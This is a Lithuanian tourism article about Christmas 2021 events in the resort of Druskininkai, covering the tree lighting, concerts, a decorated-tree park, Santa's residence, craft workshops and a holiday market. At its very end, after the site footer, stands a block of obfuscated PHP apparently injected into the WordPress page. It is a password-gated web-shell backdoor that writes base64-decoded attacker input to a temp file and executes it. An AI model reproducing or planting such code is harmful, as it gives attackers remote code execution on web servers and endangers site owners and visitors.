fbpx
A A
A A

Druskininkai kviečia patiems išpakuoti Kalėdas ir atrasti nepaprastus paprastus dalykus

2021.11.25

Druskininkai jau skaičiuoja paskutines tamsiausias metų dienas. Kurorto gatvės, vitrinos, namų langai ir terasos, alėjos, parkai ir skvereliai pamažu rėdosi šviesos instaliacijomis ir įvairiaspalviais žiburėliais. Iškritęs pirmasis sniegas kurorte akimirksniu paskleidė nerimastingą šventės nuojautą – jau laukiame Kalėdų, ruošiamės pasitikti miesto svečius, kuriame įdomias veiklas ir įspūdingus reginius, kuriais lepinsime visą šventinį laikotarpį. Kartu su Seneliu Kalėda, gnomais ir nykštukais pakuojame kalnus dovanų, slepiame jas įvairiuose kurorto kampeliuose  ir kviečiame patiems išsipakuoti kalėdinius Druskininkus. Laukia daugybė malonių staigmenų!

Išpakuok Kalėdas Druskininkuose

Šiandieninės Kalėdos kažkodėl neįsivaizduojamos be į kelis sluoksnius popieriaus įpakuotų brangių dovanų, nuo maisto lūžtančių stalų ir dirbtinėmis dekoracijomis išmargintų pastatų. O ar žinote, kad dovanų tradicija atsirado vos XX a. pradžios Lietuvos didmiesčiuose? Tuomet dovanų gaudavo tik mažieji ir jos būdavo tokios paprastos – kvepiantys kepiniai.  Praktiškos dovanos žmogui buvo dovanojamos tada, kai žmogui jų reikėjo. Niekas nelaukdavo iki Kalėdų, kad padovanotų šiltas pirštines ar kepurę, jei artimajam jų reikėdavo žiemos pradžioje.

„Iš tikrųjų didžiausia dovana įteikiama per Kūčias laužiant kalėdaitį. Tai nuoširdi padėka, atsiprašymas ir palinkėjimas, kad išsipildytų didžiausi troškimai, – sako Druskininkų kultūros centro direktorė Rimutė  Viniarskaitė. – Visi kiti daiktai tikrai daug įtakos neturi, o gerumas išties gali pakeisti gyvenimą. Tiesa, kažkada Kalėdų rytą vyresnieji,  grįžę namo iš bažnyčios, sugiedodavo kalėdinės giesmės posmelį ir atveždavo vaikams lauktuvių. Dažniausiai tai buvo nedidelės valgomos dovanos.“

Šiais laikais, pasak R. Viniarskaitės, didžiulė dovana yra į namus iš toliau ar arčiau sugrįžtantys šeimos nariai. „Buvimas kartu, atleidimas ir meilė yra pačios vertingiausios dovanos. Pastarieji metai atskirai nuo šeimos ir artimųjų parodė, kiek nedaug reikia, kad šventės būtų ramios, pilnos vidinės šilumos ir šviesos, – tęsia mintį Rimutė. – Todėl šįmet ir pasirinkta tokia kalėdinės šventės Druskininkuose tema, raginanti sugrįžti prie prasmingumo ir natūralumo, atrasti paprastus dalykus ir suprasti didelę jų vertę.“

Šviesos, spalvos, kvapai ir staigmenos – tokios bus šiųmetės Kalėdos

„Kasmet iš anksto galvojame, ką įdomaus ir įspūdingo per šventes pasiūlyti druskininkiečiams ir kurorto svečiams. Jei pandemija nepakeis planų, būsime laimingi, kad pagaliau galime susitikti ir dalintis šventine nuotaika gyvai, – sako Druskininkų meras Ričardas Malinauskas. – Tęsiame pastarųjų metų didžiųjų renginių tradicijas, tad Druskininkai ir vėl bus išskirtinai šviesūs, ryškūs ir spalvingi. Žinoma, kupini staigmenų, nes toks mūsų šių metų šūkis – išpakuok dovaną! Tikimės, kad ir mažas, ir senjoras ras ką pamatyti, kur pasivaikščioti ir pasisemti puikios švenčių laukimo nuotaikos.“

Žiemos švenčių sezono pradžią Druskininkai skelbs pirmąjį gruodžio savaitgalį.  Gruodžio 3-ąją bus išpakuota pirmoji Druskininkų dovana: įsižiebs daugiau kaip 20 metrų aukščio stulbinanti karūnuota didžioji miesto eglė. Baltu sniegu nuklotos eglės šakose pasileis šokti įspūdingos lazerių projekcijos. Senelis Kalėda pažadėjo atvykti į šventę su gnomais ir padėti Laikrodininkui įveikti metus baigiančio skaičiuoti senojo laikrodžio maištą. Ups, prasitarėm! Juk tai dar viena Jūsų laukianti dovana!

Aikštėje įsikūrusiame kalėdiniame miestelyje virs pilnas garsų, kvapų, kalbų, dovanų ir paslapčių gyvenimas. Šalia eglės statomi skaidrūs kupolai, o kokias kalėdines pasakas juose sukurs miesto bendruomenė, vėlgi lieka paslaptyje iki pat šventės pradžios.

Savaitgalių vakarais nušvis didysis Pramogų aikštės ekranas ir atsidarys Kalėdų kino teatras. Vakaro istorijas seks Kalėdų Nykštukas, animacinių filmų herojai kvies leistis kartu į linksmus nuotykius, skambės vaizdo ir gyvos muzikos koncertai. Keturis savaitgalius scenoje šventinius koncertus gyvai surengs jauni ir žavūs atlikėjai: vaikų popchoras „O lia lia vaikai“ džiugins žavinga ir linksma muzikine programa „O lia lia Kalėdos!”, scenoje liesis Justės Kraujelytės, atlikėjos ir dainų autorės, atvirai besidalijančios savo jautriais išgyvenimais, melodingos dainos, švelnaus balso tembro romantiškasis Dainotas Varnas pirmąją Kalėdų dieną publikai atrinko pačius gražiausius ir kalėdinę dvasią atitinkančius kūrinius, dar negirdėtas autorines dainas atliks talentingasis Gebrasy.

Kalėdinių eglučių pasaka ir veidrodžių karalystės paslaptys

Netoliese, Gydyklų parke, aplink Druskininkų muzikinį fontaną naujomis spalvomis ir nežabota fantazija suspindės 65 originalių, verslo ir bendruomenės sukurtų kalėdinių eglučių parkas, kasmet nustebinantis ypatingu kūrybiškumu ir netikėtais sprendimais. Kurorto įstaigos ir organizacijos tam jau intensyviai ruošiasi, tačiau kūrybinius sumanymus saugiai laiko paslaptyje. Lauksime jų leidimo išpakuoti šią dovaną! Tačiau garantuojame, kad pasivaikščioti parke bus tikras malonumas. O jei atvyksite su mažaisiais, nepraleiskite muzikinių ir kitų garsinių pasakų valandos.

„Kurortas prisitaikė prie aplinkybių ir planuodamas renginius orientuojasi į inovatyvius sprendimus, kurie leidžia taip organizuoti šventinius renginius bei kitas veiklas, kad druskininkiečiai ir kurorto svečiai galėtų saugiai grožėtis kurortu, išsiskirstydami po puošnias erdves, – sako Druskininkų savivaldybės Turizmo, komunikacijos ir kultūros skyriaus vedėja Vaiva Žagunienė. – Šventinei nuotaikai sukurti naudojame šiuolaikines technologijas, dizaino inovacijas, lazerius, specialų apšvietimą, profesionalius kūrėjus ─ sumanymai turėtų patikti mūsų svečiams.“

Tad Druskininkai ir vėl stebins šventiniu miesto erdvių papuošimu bei spalvingomis iliuminacijomis. Magiškos instaliacijos pasitiks vos įvažiavus į Druskininkus: sankryžoje prie Druskonio ežero įsižiebs trys auksu karūnuotos pušys – kurorto simbolis, o Senelio Kalėdos švytintys elniai pasiprašė įrengti jiems poilsio vietą prie pat miesto vartų – taip jie nori pasveikinti visus atvykstančius.

Vakarais, laikantis rekomendacijų ir saugių atstumų, drauge su artimiausiais žmonėmis bus smagu pasivaikščioti po spindinčias, šventiškai nuteikiančias ir melodingai skambančias miesto erdves. Tereiks suktis šokio ritmu ar tiesiog skaičiuoti žingsnius ir atrasti į medžius nusileidusias žvaigždes, grojančias fėjas, paslaptingas burtininkes ar šokėjus iš pasakos. Šįmet savo apdarus pakeis ir muzikinis fontanas, pakviesiantis nukeliauti į magišką veidrodžių karalystę. Gal toje karalystėje pavyks rasti Alisą?

Nepažadame, bet gali būti, kad labai to trokštantiems pavyks sutikti šviesomis žaižaruojančiu kalėdomobiliu tyliai pralekiantį Senelį Kalėdą ar jo pagalbininkus. Ir perduoti dailiai ir nuoširdžiai parašytą laišką su pačiais gražiausiais linkėjimais. O jei neapvyks – laišką bus galima įmesti į kalėdinio pašto dėžutę prie miesto eglės.

Savaitgaliais  – smagūs pokalbiai ir susitikimai su Seneliu Kalėda

Pramogų aikštėje tradiciškai įsikurs Senelio Kalėdos rezidencija. Deja, šįkart adreso nurodyti negalime, tad tiesiog ieškokite, kur plevėsuos raudonos vėliavos su RIMI ženklu. Ši šauni parduotuvė maloniai priėmė į savo kaimynystę Senelį Kalėdą ir jo pagalbininkus (oi, tikriausiai laukia jo dovanų?). Taigi, visi einantys pro šalį tarsi pro padidinamąjį stiklą matys paslaptingą ir magišką Senelio pasiruošimą didžiosioms šventėms. O jis nekantriai laukia susitikimų su savo mažaisiais draugais, tik primena, kad vaikus lydintys tėveliai būtinai turėtų galimybių pasą – tai labai svarbus leidimas! Šalia Senelio Kalėdos rezidencijos įsikurs jo pagalbininkai, kurie pamokys mažuosius pasigaminti įsegamą ženkliuką ar nusilipdyti molinę figūrėlę.

Didžiosios Kalėdų dirbtuvėlės šįmet įsikurs Druskininkų amatų centre „Menų kalvė“. Čia vyks gausybė edukacinių užsiėmimų ir vaikams, ir suaugusiems. Profesionalūs dailininkai ir amatininkai mokys pasigaminti kalėdinius papuošimus iš molio, sukurti grafikos paveikslėlį ar dekupažo technika dekoruoti pasirinktą daiktą, pasigaminti žaisliukų eglutei iš pačių ištapyto šilko ar kitų medžiagų ir dar daug įdomių dalykų.

Beje, dar galite spėti užsiregistruoti į paskutinį lapkričio šeštadienį čia vyksiančias šventinių meduolių dekoravimo ir kalėdinio vainiko gaminimo dirbtuves.

Ir, žinoma, tiesiog būtina nusifotografuoti su gyvais žaislais, kuriuos sutiksite Pramogų aikštėje. Tokia kalėdinė fotosesija prie Kalėdų eglės – tai tikrų tikriausias MUST HAVE.

Prieš Kalėdas – į šventinį turgų išleisti metų atlyginimo

Kokios Kalėdos be šventinio turgaus klegėjimo, spalvų, unikalių gaminių, nosį švelniai kutenančio cinamoninių bandelių ir karštos kakavos aromato? Prieššventiniai kalėdiniai turgūs, kurie dažniausiai vykdavo aikštėse prie bažnyčių, savitą atspalvį Advento metui suteikdavo jau nuo senų laikų. Turgūs turėdavo smagius pavadinimus: šeškaturgiai, skaistaturgiai ir saldaturgiai. Šeškaturgyje prekiauta šiltais drabužiais, batais, kailinukais, megztomis pirštinėmis ir šalikais – tuo, kas žmogui reikalingiausia apsiginti nuo žiemos šalčių. Po jo buvo laukiama skaistaturgio – dovanų mugės. Čia buvo galima įsigyti prabangos prekių – gražesnių skarelių, laikrodžių, žiedą, karolius ar dovanėlę sužadėtiniui, sužadėtinei. Trečią savaitę vykdavo saldaturgis, kuriame prekiauta įvairiais skanumynais. Čia buvo įmanoma rasti visa, ko prireiks šventiniam stalui – kalėdinę žąsį ar pusę kiaulės galvos, aguonų, kanapių, linų sėmenų, medaus, spanguolių, obuolių, džiovintų grybų. Vėliau – jau ir eglučių, iš šiaudų bei spalvoto popieriaus padarytų eglutės papuošalų. Beje, kadangi žmonės metinį atlyginimą ištarnavę gaudavo  metų pabaigoje, tai jaunimui turgūs būdavo geriausia pamoka tuos pinigus išleisti teisingai.

Pasak Druskininkų savivaldybės Turizmo, komunikacijos ir kultūros skyriaus vedėjos Vaivos Žagunienės, Druskininkuose bus bandoma prikelti šią tradiciją: „Sukursime naują lankytiną erdvę – aikštę prie Druskininkų Švč. Mergelės Marijos Škaplierinės bažnyčios šįmet nuspalvins kalėdiškai dekoruoti prekybiniai nameliai. Čia bus prekiaujama karštais gėrimais ir, žinoma, vaikų pamėgtomis saldžiomis spurgytėmis, džiovintų vaisių ir kitais skanumynais. Pirkėjai tikrai atras unikalių dirbinių, tinkamų kalėdinėms dovanėlėms.“

Prie bažnyčios šįmet įsikurs ir tradicinė prakartėlė su gyvomis avelėmis, kurią įprasmins liturginiai papročiai ir simboliai. Tačiau apie tai – vėliau. Juk negalima visų dovanų išpakuoti iš karto, bet patikėkit – čia laukia daugybė smagumynų!

Pajudėk, patirk, sužinok!

Šventiniu laikotarpiu veiklų atras ir norintys akyviau pajudėti, pažinti ar patirti. Į Druskininkus vėl sugrįžta Kalėdinės orientacinės Druskininkuose, žadančios gerą nuotaiką ir daug smagių potyrių. Ekskursijų mėgėjų lauks gidė Lilijana, kviesianti į ekskursiją „M. K. Čiurlionis Druskininkuose – nauju žvilgsniu“, kurios metu, sužinosite, koks buvo kurortas kūrėjo gyvenimo čia metais, susipažinsite su simbolistine kūryba per neseniai atnaujintas M. K. Čiurlionio paveikslų reprodukcijas, puošiančias miesto erdves.

„Menų kalvė“ pristatys trijų menininkų – keramiko D. Jotaučio, tapytojos R. Bolienės ir medžio skulptoriaus A. Merkio parodas, o gruodžio 29 d. atidarys tradicinę druskininkiečių menininkų kalėdinę parodą „Pokalbiai“. Tikrai verta paganyt akis!

Na, mielieji, mes tikrai atskleidėme ne visas paslaptis. Neatplėštų dovanų liko dar labai daug! Tad kviečiame leistis į svaiginantį, neišdildomų įspūdžių kupiną kalėdinį nuotykį Druskininkuose! Tačiau prieš važiuodami į šventinį kurortą, nepamirškite pasidomėti, kokia yra Jūsų viešnagės dienomis numatyta Kalėdų miestelio programa. Specialiai Kalėdoms sukurtame puslapyje rasite viską, kas susiję su dviem žodžiais – KALĖDOS ir DRUSKININKAI.

Visit Druskininkai
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}